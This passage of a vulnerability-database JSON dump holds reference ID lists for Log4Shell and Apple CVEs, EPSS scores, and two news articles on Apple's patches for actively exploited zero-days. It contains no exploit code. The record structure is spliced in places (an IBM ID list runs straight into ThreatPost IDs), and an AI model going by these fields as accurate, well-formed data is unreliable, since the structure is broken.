"8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A57FBD78-A654-5CEE-8291-163C8AFB7210", 
"A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AB5B35BD-2A55-5B27-A126-0CF1A7E7B145", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B9A69678-D96F-528D-B436-366259B4A283", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "BFE641BE-701F-5AE0-A891-975C96EFFAF6", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C60B1B73-A009-5CE1-9D6C-3B66270812FD", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", 
"CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "CF96C0AC-16EB-57DE-B450-775CC256F1C2", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "D1E393B9-589D-5A20-8799-0F762FD361DA", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D536CD4F-33F2-570F-BA34-54E141F1132C", "D64C04EA-093F-5924-A39B-714908D4637E", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "D8246B9C-AC86-5FFA-AA8F-4419E4CD07F1", "D9F6E4B0-AC2C-5A70-B795-360757BE02D2", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DE88B6AE-5D54-5B49-A097-57038C720463", "DECBAC7B-9235-5E00-81C1-142CD41306FB", "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4103A50-881C-52BB-86CC-27F549B798E9", "E4491698-477C-599A-A65D-EBA7441764E9", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E5280802-AB3D-5E96-83E0-97F22FB9EACA", "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E981B35D-7356-5A5A-963A-744545A4E51C", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", 
"EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F493C59E-F2A7-52D1-B4B5-69CD3748C5E9", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F50E9F2C-8C80-5A76-A993-A3E42414D797", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F6A3D0A7-D380-5633-BFA5-3633EEBB6CDF", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "F99D82FC-3BE5-5B6D-8FDC-0E5BF9C0CE58", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:A395083F123D276DEBD13E65116FEA09", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1425474", "H1:1427589", "H1:1429014", "H1:1438393", "H1:1624137"]}, {"type": "hivepro", "idList": ["HIVEPRO:0D02D133141B167E9F03F4AC4CA5579A", "HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:28A01D4CBC8A05BECFBA17B5AF4793F1", "HIVEPRO:2A4C96F3CDC5144909A1C1EA5E182515", "HIVEPRO:310F7AA9457FF55D42E100B468844E6D", "HIVEPRO:5339CBE01BD312A79B81CAAEE0F3B32E", "HIVEPRO:57EAE0D1FD9EA88C12142AFF641985C3", "HIVEPRO:753BDE83C1D82672DBEDB937144E1598", "HIVEPRO:B25417250BE7F8A7BBB1186F85A865F9", "HIVEPRO:C037186E3B2166871D34825A7A6719EE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", 
"idList": ["004795EC88EC224A6BFB93940B96344B4EB9FAFDD91D056225AB0FB24FFE6CFE", "00B8C97EE29C4817481434B7FD887049A0EA42C49E5514E1877ED97B5322DB16", "00CA973D0D5F4A08ADB77D27F66CF53D661D1B67B8DA263B3CE4522918A4CFFF", "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "01C1A66F149F6CC650556CCBE7E381780D3142691366A6B6EFBC8CD5C674BD4D", "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "03991456EAB03B09B39DC9DB5C8BE4A51167523943AA9AE61168FCD6FBACC80B", "03FB798F067FAF41EB009C69979886C89AC88567ECBC9DAD159CDC2AB547C1F7", "048C762AAACAFC74604EFAB15A41479F902FA040758DF428CB364B0242E01EE5", "04D3658F043D6F4A2AA1B2F519A7E89C112641C7C4E2E58E14BEC11BA66E803D", "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "05A1D58708802BF8C1674EE32BEC4344254929330218CAD68AA838AA7F549BF7", "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "05C0F0FFAAC20F511D50030C8EC7ECBE67EB162A7352C90C63F986E1F73F829F", "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "05DC2B42328B1D8271D4FF358EC4A58529E6A6A6B8D7E154A691EFE1CCE81D1A", "06B617CF301DC9505BA9DD5DB1C356FC3A1CCF92C2BD6C1F311F6B9EB8C0F85A", "07F48EB2EFD881D21294E1AFEEE704414B9605E4B9B1F4BF6C82B1917372C2B8", "084618FE115DBC963CDA469EFDF156D77B5FAF5BE04B99575716D75AE5C42F9B", "08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "086B39C8EEA9E80F827A72EB837BB35072FC75FA2EFB8DDEC667E6F0D07BFC82", "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", "0A50FDB1D7E17C09815A2D06C237539FFD67E23789BDD9A730E5EB3DD9473349", "0A6CCE42A31E930F28AFDE0602BBBC571E0114C6DE44000B246AC3D8A844DE39", "0AE80E7D1B92F5584C0652988A6BC58F1CE1E37349CB543C23A7BCE8C2445CCD", "0B0C1C8C8CE115B4178E3F36D545ECA410D6199928FD71C89DC4DE93BB9DDD9F", 
"THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", 
"THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", 
"THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trellix", "idList": ["TRELLIX:357BDB16F9C97C350D8CFF381DE2C04E", "TRELLIX:39F5630F37B0A70500113404A73FE414", "TRELLIX:4EE3028711C16E3513FC2CF300440452", "TRELLIX:73420774AE3767CFB11F493B41572174", "TRELLIX:7B9C31B3E2F1A079101A700230D5A5C0", "TRELLIX:908157CFA8050AA23921170E873187E1", "TRELLIX:D57FEAD5DBF6D915430C791AC26C10CC", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046", "UB:CVE-2022-22594", "UB:CVE-2022-22620"]}, {"type": "veeam", "idList": ["VEEAM:KB4254"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348", "VERACODE:34009", "VERACODE:34313"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889", "1337DAY-ID-38098"]}]}, "exploitation": null, "score": {"value": -0.0, "vector": "NONE"}, "epss": [{"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-18"}, {"cve": 
"CVE-2022-22587", "epss": "0.001030000", "percentile": "0.404270000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22594", "epss": "0.000700000", "percentile": "0.283760000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22620", "epss": "0.000930000", "percentile": "0.381750000", "modified": "2023-03-18"}], "vulnersScore": -0.0}, "_state": {"dependencies": 1678920471, "score": 1698844884, "epss": 1679178262}, "_internal": {"score_hash": "fc43876539ee7664c2c56fc7e8da9e5d"}}
{"thn": [{"lastseen": "2022-05-09T12:37:34", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjWiyPjnO359TQw-ASi6DIPZwvn9wVYFPNKS3PisnT8ANUMYz00ayq07GNT9j1BFhyIS-D-jW986AambKLx09TTpm1sTyhHBIwq5WnnLL6xLWbYO1lXdLaECt48nhwVzddm8IqWxgudeEmeXUPQEYzzGysp58wveGqZNvgqyliX2YcqPhBbbb8vV41h>)\n\nApple on Thursday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213093>), [macOS](<https://support.apple.com/en-us/HT213092>), and [Safari](<https://support.apple.com/en-us/HT213091>) to address a new WebKit flaw that it said may have been actively exploited in the wild, making it the company's third zero-day patch since the start of the year.\n\nTracked as CVE-2022-22620, the issue concerns a use-after-free vulnerability in the WebKit component that powers the Safari web browser and could be exploited by a piece of specially crafted web content to gain arbitrary code execution. \n\n\"Apple is aware of a report that this issue may have been actively exploited,\" the company said in a terse statement acknowledging in-the-wild attacks leveraging the flaw.\n\nThe iPhone maker credited an anonymous researcher for discovering and reporting the flaw, adding it remediated the issue with improved memory management.\n\nThe updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation), macOS devices running Big Sur and macOS Catalina, and also as a standalone update for Safari.\n\nThe latest fix brings the tally of zero-day patches issued by Apple for 2022 to three, including [CVE-2022-22587 and CVE-2022-22594](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>), that could have been exploited to run arbitrary code and track users' online activity in the web browser.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-11T03:30:00", "type": "thn", "title": "Apple Releases iOS, iPadOS, macOS Updates to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620"], "modified": "2022-02-11T03:30:50", "id": "THN:BD5ADDFE4C645A1619B0A94487CE63DF", "href": "https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhEqKxDFmqhm8NEDiewGhtNosTQBetNOal6t8n-4FoDdS8Kohm2E_VIZmFt-TPGCUJfQqQR3I7FPUW16SUdjUlffpqOIkMXuwO85Pl8ENa14N6-OhtYk5Ft_5V-I0aQwBj6iNfvx3_Z5DnTUwfcvtSl6p_28rahMQ1dk0sc12TyBQhB-9vuz8heo2me/s728-e100/apple.jpg>)\n\nApple on Thursday rolled out 
emergency patches to address two zero-day flaws in its [mobile](<https://support.apple.com/en-us/HT213219>) and [desktop operating systems](<https://support.apple.com/en-us/HT213220>) that it said may have been exploited in the wild.\n\nThe shortcomings have been fixed as part of updates to iOS and iPadOS 15.4.1, macOS Monterey 12.3.1, tvOS 15.4.1, and watchOS 8.5.1. Both the vulnerabilities have been reported to Apple anonymously.\n\nTracked as **CVE-2022-22675**, the issue has been described as an [out-of-bounds write](<https://cwe.mitre.org/data/definitions/787.html>) vulnerability in an audio and video decoding component called AppleAVD that could allow an application to execute arbitrary code with kernel privileges.\n\nApple said the defect was resolved with improved bounds checking, adding it's aware that \"this issue may have been actively exploited.\"\n\nThe latest version of macOS Monterey, besides fixing CVE-2022-22675, also includes remediation for **CVE-2022-22674**, an [out-of-bounds read](<https://cwe.mitre.org/data/definitions/125.html>) issue in the Intel Graphics Driver module that could enable a malicious actor to read kernel memory.\n\nThe bug was \"addressed with improved input validation,\" the iPhone maker noted, once again stating there's evidence of active exploitation, while withholding additional details to prevent further abuse.\n\nThe latest updates bring the total number of actively exploited zero-days patched by Apple to four since the start of year, not to mention a publicly disclosed flaw in the [IndexedDB API](<https://thehackernews.com/2022/01/new-unpatched-apple-safari-browser-bug.html>) (CVE-2022-22594), which could be weaponized by a malicious website to track users' online activity and identities in the web browser.\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel 
privileges\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n\nIn light of active exploitation of the flaws, Apple iPhone, iPad, and Mac users are highly recommended to upgrade to the latest versions of the software as soon as possible to mitigate potential threats.\n\nThe iOS and iPad updates are available to iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T02:43:00", "type": "thn", "title": "Apple Issues Patches for 2 Actively Exploited Zero-Days in iPhone, iPad and Mac Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
